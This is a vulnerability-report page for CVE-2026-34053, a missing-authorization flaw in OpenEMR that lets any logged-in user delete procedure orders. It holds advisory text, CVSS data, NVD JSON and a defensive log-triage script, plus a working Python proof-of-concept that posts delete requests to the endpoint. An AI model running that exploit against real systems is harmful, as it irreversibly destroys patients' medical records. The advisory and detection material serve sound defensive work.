Security Vulnerability Report
CVE-2026-34053 CVSS 7.1 HIGH

Published: 2026-03-26 00:16:41
Last Modified: 2026-03-26 16:17:22

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, missing authorization in the AJAX deletion endpoint `interface/forms/procedure_order/handle_deletions.php` allows any authenticated user, regardless of role, to irreversibly delete procedure orders, answers, and specimens belonging to any patient in the system. Version 8.0.0.3 patches the issue.
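The description gives a responder two immediate questions: is the deployed OpenEMR below the first fixed release, 8.0.0.3, and who has already called `interface/forms/procedure_order/handle_deletions.php`? The following Python helpers answer both. This is an added example, not code from the advisory, the NVD record or the OpenEMR project: the version comparison follows the "prior to 8.0.0.3" boundary stated above, the access-log format (Apache/Nginx "combined") is an assumed deployment default, the sample log lines, hostnames and addresses are constructed, and the "scripted client" heuristic (no Referer plus a non-browser User-Agent) is the author's assumption rather than a fingerprint from the advisory.

```python
"""Triage helpers for CVE-2026-34053 (OpenEMR < 8.0.0.3).

Added example, not part of the advisory or the OpenEMR code base:
- is_affected(): is an installed version string below the fixed release 8.0.0.3?
- find_deletion_requests(): which access-log requests reached the deletion endpoint?
"""
import re
from collections import Counter

FIXED_VERSION = (8, 0, 0, 3)          # first release that patches the issue
ENDPOINT = "interface/forms/procedure_order/handle_deletions.php"

# Apache/Nginx "combined" log format; assumed here, adjust for your LogFormat.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_version(version):
    """'8.0.0.3' -> (8, 0, 0, 3). A trailing label such as '-dev' is ignored."""
    core = re.match(r"\s*(\d+(?:\.\d+)*)", version)
    if not core:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in core.group(1).split("."))


def is_affected(version):
    """True when the version sorts below 8.0.0.3.

    Python compares tuples element-wise and treats a shorter prefix as smaller,
    so '8.0.0' < (8, 0, 0, 3) and is correctly reported as affected.
    """
    return parse_version(version) < FIXED_VERSION


def find_deletion_requests(log_lines):
    """Return one record per request whose path contains the deletion endpoint."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or ENDPOINT not in m.group("path"):
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "method": m.group("method"),   # only a POST can trigger the deletion
            "status": int(m.group("status")),
            # Heuristic (assumption): a missing Referer together with a non-browser
            # User-Agent suggests a scripted client rather than the EMR web UI.
            "scripted": m.group("referer") == "-" and "Mozilla" not in m.group("ua"),
        })
    return hits


def summarize_by_ip(hits):
    """Number of POSTs to the endpoint per source IP, for quick prioritisation."""
    return Counter(h["ip"] for h in hits if h["method"] == "POST")


# Constructed sample log lines (hosts, addresses and times are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Mar/2026:09:14:02 +0000] "POST /openemr/interface/forms/procedure_order/handle_deletions.php HTTP/1.1" 200 17 '
    '"http://emr.example/openemr/interface/patient_file/summary/demographics.php" "Mozilla/5.0"',
    '10.0.0.5 - - [26/Mar/2026:09:14:03 +0000] "POST /openemr/interface/forms/procedure_order/handle_deletions.php HTTP/1.1" 200 17 '
    '"-" "python-requests/2.31.0"',
    '10.0.0.9 - - [26/Mar/2026:09:15:10 +0000] "GET /openemr/interface/main/tabs/main.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [26/Mar/2026:09:16:44 +0000] "POST /openemr/interface/forms/procedure_order/handle_deletions.php HTTP/1.1" 302 0 '
    '"-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in ("7.0.3", "8.0.0", "8.0.0.3", "8.0.1"):
        print(f"OpenEMR {v}: {'affected' if is_affected(v) else 'patched'}")
    hits = find_deletion_requests(SAMPLE_LOG)
    for h in hits:
        print(h)
    print("POSTs per IP:", dict(summarize_by_ip(hits)))
```

Web-server logs carry no OpenEMR username, so a hit list from this script still has to be correlated with the application's own audit log before a deletion can be attributed to an account. Because the deletions are irreversible, any procedure orders, answers or specimens removed through this endpoint can only be recovered from database backups taken before the requests in the hit list.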

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

The 7.1 score is the secondary assessment in the raw JSON below. The primary assessment in the same record rates availability impact High rather than Low, giving CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H and a base score of 8.1 (HIGH); both agree on network reachability, low complexity, low privileges (any authenticated account) and no user interaction. Weakness: CWE-862 (Missing Authorization).

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEMR < 8.0.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit_openemr(target_url, session_cookie, target_pid, order_id):
    """
    Exploit CVE-2026-34053: Unauthorized Deletion in OpenEMR.
    """
    # The vulnerable endpoint
    endpoint = "/interface/forms/procedure_order/handle_deletions.php"

    # Headers with the authenticated session (any role; the endpoint performs no authorization check)
    headers = {
        "Cookie": f"OpenEMR={session_cookie}",
        "User-Agent": "Mozilla/5.0 (Exploit Client)",
    }

    # Payload to delete a specific procedure order
    # Adjust parameters based on actual form requirements
    payload = {
        "mode": "delete",
        "pid": target_pid,          # Patient ID to target
        "proc_order_id": order_id,  # Procedure Order ID to delete
    }

    try:
        response = requests.post(target_url + endpoint, data=payload, headers=headers, timeout=15)
        if response.status_code == 200:
            # HTTP 200 only shows the endpoint answered; confirm the deletion in the application
            print(f"[+] Success: Data deleted for PID {target_pid}, Order {order_id}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed: HTTP {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    # Example usage
    # Replace with actual target details
    TARGET = "http://localhost/openemr"
    SESSION = "valid_session_id_here"
    exploit_openemr(TARGET, SESSION, "1", "100")

References

https://github.com/openemr/openemr/security/advisories/GHSA-3vvq-pfq6-pw98 (Vendor Advisory, Exploit)
https://github.com/openemr/openemr/commit/7a16b731af7d34ffd92155fe2a5692fa1a67858e (Patch)
https://github.com/openemr/openemr/releases/tag/v8_0_0_3 (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34053", "sourceIdentifier": "[email protected]", "published": "2026-03-26T00:16:41.057", "lastModified": "2026-03-26T16:17:22.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, missing authorization in the AJAX deletion endpoint `interface/forms/procedure_order/handle_deletions.php` allows any authenticated user, regardless of role, to irreversibly delete procedure orders, answers, and specimens belonging to any patient in the system. Version 8.0.0.3 patches the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación de gestión de registros de salud electrónicos y práctica médica de código abierto y gratuita. Antes de la versión 8.0.0.3, la falta de autorización en el endpoint de eliminación AJAX 'interface/forms/procedure_order/handle_deletions.php' permite a cualquier usuario autenticado, independientemente de su rol, eliminar irreversiblemente órdenes de procedimientos, respuestas y muestras pertenecientes a cualquier paciente en el sistema. La versión 8.0.0.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.3", "matchCriteriaId": "E3E098AF-42A1-4798-85A7-80052F19F809"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/7a16b731af7d34ffd92155fe2a5692fa1a67858e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-3vvq-pfq6-pw98", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-3vvq-pfq6-pw98", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}